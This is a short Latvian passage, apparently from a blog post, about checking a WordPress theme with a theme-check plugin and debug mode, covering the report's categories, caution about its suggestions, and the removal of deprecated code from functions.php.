• Ieteicams - ieteikumi par iespējamu jaunu funkciju izmantošanu;
• Info - citi informatīvie ziņojumi.

Lielāko daļu neizpildīto prasību atbalsta atsauces uz kodu, kurā aprakstītas funkcijas un parametri. Tomēr ziņojums jau ir diezgan informatīvs. Neliels fragments:

Pret testa rezultātiem jāizturas ar zināmu piesardzību. Jums nevajadzētu izmantot pilnīgi visas spraudņa ieteiktās funkcijas - starp tām, iespējams, būs tādas, kuras jūs patiešām neplānojat izmantot.

Izmantojot atkļūdošanas režīmu un motīvu pārbaudes spraudni, es varēju identificēt vairākas problēmas, ko izraisīja novecojušas funkcijas. Daži funkcijas.php uzlabojumi tika noņemti kā nevajadzīgi vai aizstāti ar standarta risinājumiem, kas parādījās jaunākās versijas. Iesaku apskatīt savus emuārus!